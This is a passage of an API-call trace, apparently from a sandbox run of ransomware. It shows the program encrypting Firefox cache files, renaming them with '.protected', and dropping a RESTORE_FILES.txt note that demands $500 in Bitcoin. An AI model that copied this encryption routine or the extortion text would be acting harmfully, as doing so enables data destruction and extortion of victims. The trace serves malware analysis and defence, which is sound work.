[0086.213] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.213] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.213] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\..") returned 100 [0086.213] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.213] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.213] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.213] lstrcmpiW (lpString1="10", lpString2="Windows") returned -1 [0086.213] lstrcmpiW (lpString1="10", lpString2="Program Files") returned -1 [0086.213] lstrcmpiW (lpString1="10", lpString2="Program Files (x86)") returned -1 [0086.213] lstrcmpiW (lpString1="10", lpString2="$Recycle.bin") returned 1 [0086.213] lstrcmpiW (lpString1="10", lpString2="System Volume Information") returned -1 [0086.213] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10") returned 100 [0086.213] lstrcmpW (lpString1="10", lpString2=".") returned 1 [0086.213] lstrcmpW (lpString1="10", lpString2="..") returned 1 [0086.214] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\*") returned 102 [0086.214] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0086.214] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.214] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.214] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.214] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.214] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.214] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\.") returned 102 [0086.214] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.214] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.215] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.215] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.215] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.215] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.215] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.215] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\..") returned 103 [0086.215] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.215] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.215] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.215] lstrcmpiW (lpString1="16A09d01", lpString2="Windows") returned -1 [0086.215] lstrcmpiW (lpString1="16A09d01", lpString2="Program Files") returned -1 [0086.215] lstrcmpiW (lpString1="16A09d01", lpString2="Program Files (x86)") returned -1 [0086.215] lstrcmpiW (lpString1="16A09d01", lpString2="$Recycle.bin") returned 1 [0086.215] lstrcmpiW (lpString1="16A09d01", lpString2="System Volume Information") returned -1 [0086.215] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\16A09d01") returned 109 [0086.215] StrStrIW (lpFirst="16A09d01", lpSrch=".protected") returned 0x0 [0086.215] lstrcmpW (lpString1="16A09d01", lpString2="RESTORE_FILES.txt") returned -1 [0086.215] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0086.215] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0086.215] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\16A09d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\10\\16a09d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0086.216] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\16A09d01") returned 109 [0086.216] StrStrW (lpFirst="16A09d01", lpSrch=".txt") returned 0x0 [0086.216] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\16A09d01") returned 109 [0086.216] StrStrW (lpFirst="16A09d01", lpSrch=".rar") returned 0x0 [0086.216] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\16A09d01") returned 109 [0086.216] StrStrW (lpFirst="16A09d01", lpSrch=".zip") returned 0x0 [0086.216] ReadFile (in: hFile=0x160, lpBuffer=0xcf0090, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.218] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.218] WriteFile (in: hFile=0x160, lpBuffer=0xcf0090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.218] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.218] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0086.218] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0086.218] CloseHandle (hObject=0x160) returned 1 [0086.219] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\16A09d01.protected") returned 119 [0086.219] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\16A09d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\10\\16a09d01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\16A09d01.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\10\\16a09d01.protected")) returned 1 [0086.220] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0086.220] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0086.220] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\RESTORE_FILES.txt") returned 118 [0086.220] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\10\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0086.220] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.220] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0086.221] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.221] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.221] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.221] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0086.221] CloseHandle (hObject=0x15c) returned 1 [0086.222] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.222] lstrcmpiW (lpString1="2C", lpString2="Windows") returned -1 [0086.222] lstrcmpiW (lpString1="2C", lpString2="Program Files") returned -1 [0086.222] lstrcmpiW (lpString1="2C", lpString2="Program Files (x86)") returned -1 [0086.222] lstrcmpiW (lpString1="2C", lpString2="$Recycle.bin") returned 1 [0086.222] lstrcmpiW (lpString1="2C", lpString2="System Volume Information") returned -1 [0086.222] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C") returned 100 [0086.222] lstrcmpW (lpString1="2C", lpString2=".") returned 1 [0086.222] lstrcmpW (lpString1="2C", lpString2="..") returned 1 [0086.222] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\*") returned 102 [0086.222] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0086.222] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.222] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.222] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.222] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.222] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.222] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\.") returned 102 [0086.222] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.222] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.222] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.222] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.222] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.222] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.223] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.223] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\..") returned 103 [0086.223] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.223] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.223] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.223] lstrcmpiW (lpString1="24B53d01", lpString2="Windows") returned -1 [0086.223] lstrcmpiW (lpString1="24B53d01", lpString2="Program Files") returned -1 [0086.223] lstrcmpiW (lpString1="24B53d01", lpString2="Program Files (x86)") returned -1 [0086.223] lstrcmpiW (lpString1="24B53d01", lpString2="$Recycle.bin") returned 1 [0086.223] lstrcmpiW (lpString1="24B53d01", lpString2="System Volume Information") returned -1 [0086.223] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\24B53d01") returned 109 [0086.223] StrStrIW (lpFirst="24B53d01", lpSrch=".protected") returned 0x0 [0086.223] lstrcmpW (lpString1="24B53d01", lpString2="RESTORE_FILES.txt") returned -1 [0086.223] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0086.223] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0086.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\24B53d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\2c\\24b53d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0086.224] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\24B53d01") returned 109 [0086.224] StrStrW (lpFirst="24B53d01", lpSrch=".txt") returned 0x0 [0086.224] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\24B53d01") returned 109 [0086.224] StrStrW (lpFirst="24B53d01", lpSrch=".rar") returned 0x0 [0086.224] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\24B53d01") returned 109 [0086.224] StrStrW (lpFirst="24B53d01", lpSrch=".zip") returned 0x0 [0086.225] ReadFile (in: hFile=0x160, lpBuffer=0xcf0090, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.234] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.234] WriteFile (in: hFile=0x160, lpBuffer=0xcf0090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.235] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.235] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0086.235] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0086.235] CloseHandle (hObject=0x160) returned 1 [0086.235] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\24B53d01.protected") returned 119 [0086.235] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\24B53d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\2c\\24b53d01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\24B53d01.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\2c\\24b53d01.protected")) returned 1 [0086.236] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0086.236] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0086.236] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\RESTORE_FILES.txt") returned 118 [0086.236] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\2c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0086.237] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.237] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0086.238] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.238] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.238] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.238] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0086.238] CloseHandle (hObject=0x15c) returned 1 [0086.244] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.244] lstrcmpiW (lpString1="61", lpString2="Windows") returned -1 [0086.244] lstrcmpiW (lpString1="61", lpString2="Program Files") returned -1 [0086.244] lstrcmpiW (lpString1="61", lpString2="Program Files (x86)") returned -1 [0086.244] lstrcmpiW (lpString1="61", lpString2="$Recycle.bin") returned 1 [0086.244] lstrcmpiW (lpString1="61", lpString2="System Volume Information") returned -1 [0086.244] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61") returned 100 [0086.244] lstrcmpW (lpString1="61", lpString2=".") returned 1 [0086.244] lstrcmpW (lpString1="61", lpString2="..") returned 1 [0086.244] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\*") returned 102 [0086.244] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0086.244] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.244] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.244] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.244] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.244] lstrcmpiW (lpString1=".", lpString2="System Volume Information") 